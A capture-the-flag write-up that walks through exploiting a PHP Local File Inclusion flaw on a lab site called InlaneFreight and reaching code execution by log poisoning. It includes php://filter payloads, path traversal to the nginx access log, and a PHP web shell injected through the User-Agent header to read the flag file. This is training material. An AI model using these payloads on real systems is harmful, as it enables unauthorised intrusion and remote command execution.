Solving the Skills Assessment: File Inclusion and Log Poisoning
Introduction
CTF challenges are designed to test your skills in various aspects of cyber security, and this particular challenge focuses on exploiting File Inclusion vulnerabilities along with Log Poisoning. We’ll use techniques like Local File Inclusion (LFI) to achieve remote code execution and eventually discover the flag.
Step 1: Identifying the Vulnerability
Upon accessing the web application, we observe that it takes a parameter called “page” in the URL.
We attempt to test for Local File Inclusion (LFI) using the following URL:
/index.php?page=php://filter/read=convert.base64-encode/resource=configureHowever, it does not seem to work as intended. Next, we try another LFI payload:
/index.php?page=php://filter/read=convert.base64-encode/resource=indexThis time, the payload works as expected, and we get an encrypted HTML response.
Step 2: Decrypting the Response
To examine the contents of the encrypted response, we use a tool like CyberChef to decrypt it. The decrypted response reveals the HTML structure of the page.
I copy the encrypted information and decrypt with CyberChef;
<!DOCTYPE html>
<html lang="en">
<head>
<title>InlaneFreight</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="<https://fonts.googleapis.com/css?family=Poppins:200,300,400,700,900|Display+Playfair:200,300,400,700>">
<link rel="stylesheet" href="fonts/icomoon/style.css">
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/magnific-popup.css">
<link rel="stylesheet" href="css/jquery-ui.css">
<link rel="stylesheet" href="css/owl.carousel.min.css">
<link rel="stylesheet" href="css/owl.theme.default.min.css">
<link rel="stylesheet" href="css/bootstrap-datepicker.css">
<link rel="stylesheet" href="fonts/flaticon/font/flaticon.css">
<link rel="stylesheet" href="css/aos.css">
<link rel="stylesheet" href="css/style.css">
</head>
<body>
<div class="site-wrap">
<div class="site-mobile-menu">
<div class="site-mobile-menu-header">
<div class="site-mobile-menu-close mt-3">
<span class="icon-close2 js-menu-toggle"></span>
</div>
</div>
<div class="site-mobile-menu-body"></div>
</div>
<header class="site-navbar py-3" role="banner">
<div class="container">
<div class="row align-items-center">
<div class="col-11 col-xl-2">
<h1 class="mb-0"><a href="index.php" class="text-white h2 mb-0">InlaneFreight</a></h1>
</div>
<div class="col-12 col-md-10 d-none d-xl-block">
<nav class="site-navigation position-relative text-right" role="navigation">
<ul class="site-menu js-clone-nav mx-auto d-none d-lg-block">
<li class="active"><a href="index.php">Home</a></li>
<li><a href="index.php?page=about">About Us</a></li>
<li><a href="index.php?page=industries">Industries</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
</ul>
</nav>
</div>
<div class="d-inline-block d-xl-none ml-md-0 mr-auto py-3" style="position: relative; top: 3px;"><a href="#" class="site-menu-toggle js-menu-toggle text-white"><span class="icon-menu h3"></span></a></div>
</div>
</div>
</div>
</header>
<div class="site-blocks-cover overlay" style="background-image: url(images/hero_bg_1.jpg);" data-aos="fade" data-stellar-background-ratio="0.5">
<div class="container">
<div class="row align-items-center justify-content-center text-center">
<div class="col-md-8" data-aos="fade-up" data-aos-delay="400">
<h1 class="text-white font-weight-light mb-5 text-uppercase font-weight-bold">Worldwide Freight Services</h1>
<p><a href="#" class="btn btn-primary py-3 px-5 text-white">Get Started!</a></p>
</div>
</div>
</div>
</div>
<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>
<footer class="site-footer">
<div class="row pt-5 mt-5 text-center">
<div class="col-md-12">
<div class="border-top pt-5">
<p>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
Copyright ©<script>document.write(new Date().getFullYear());</script> All rights reserved | This template is made with <i class="icon-heart" aria-hidden="true"></i> by <a href="<https://colorlib.com>" target="_blank" >Colorlib</a>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
</p>
</div>
</div>
</footer>
</div>
<script src="js/jquery-3.3.1.min.js"></script>
<script src="js/jquery-migrate-3.0.1.min.js"></script>
<script src="js/jquery-ui.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.stellar.min.js"></script>
<script src="js/jquery.countdown.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/bootstrap-datepicker.min.js"></script>
<script src="js/aos.js"></script>
<script src="js/main.js"></script>
</body>
</html>Step 3: Exploring the Application
The decrypted HTML response indicates that the web application is for a company named “InlaneFreight.” We also notice that there might be an interesting endpoint in the “ilf_admin” directory.
Step 4: Gathering Server Information
To gather more information, we make a CURL request to the web application and check the server information in the response headers:
curl -I http://83.136.252.24:44906/
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 29 Jul 2023 17:11:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.22The response headers reveal that the server is running “nginx/1.18.0.”
Step 5: Accessing the Admin Panel
Since we discovered the “ilf_admin” directory, we attempt to access the admin panel using the following URL:
<http://83.136.252.24:44906/ilf_admin/index.php>
This request successfully returns the admin panel, indicating that we might have found an entry point to explore further.
Step 6: Exploring Log Files
In order to proceed, we need to find valuable log files. We suspect that the logs might contain sensitive information or potential vulnerabilities. We decide to investigate the log files by sending a GET request to the following endpoint:
GET /ilf_admin/index.php?log=system.log
To automate this process and test multiple payloads, we use Burp Intruder with a list of LFI payloads from a file named “LFI-Jhaddix.txt.”
Step 7: Log Poisoning
After running the Intruder, one of the GET requests stands out as potentially valuable. We decide to proceed with Log Poisoning using the payload from that request.
/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.logThis is important;
<script src="js/jquery.js"></script>
<script type="text/javascript" src="js/bootstrap.js"></script>Step 8: Crafting the Malicious Payload
The critical part is to add a malicious script to the User-Agent header. We modify the URL with the following:
/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt
User-Agent:<?php system($_GET["cmd"]); ?>The script will execute the “cat” command to retrieve the contents of the flag file and display them in the log.
Step 9: Retrieving the Flag
After crafting the payload, we send the request, and the server executes the command and returns the flag as part of the log response.
Conclusion
By exploiting File Inclusion and Log Poisoning vulnerabilities, we successfully gained remote code execution and discovered the flag in the root directory of the web application’s file system. CTF challenges like this are excellent opportunities to test and enhance your cyber security skills, providing valuable learning experiences for real-world scenarios.
Remember, it’s essential to stay ethical and only engage in CTF challenges on platforms where such activities are explicitly permitted. Always respect the rules and guidelines of the CTF competition to ensure a fair and enjoyable experience for all participants.
Happy hacking and good luck with your future CTF endeavors!
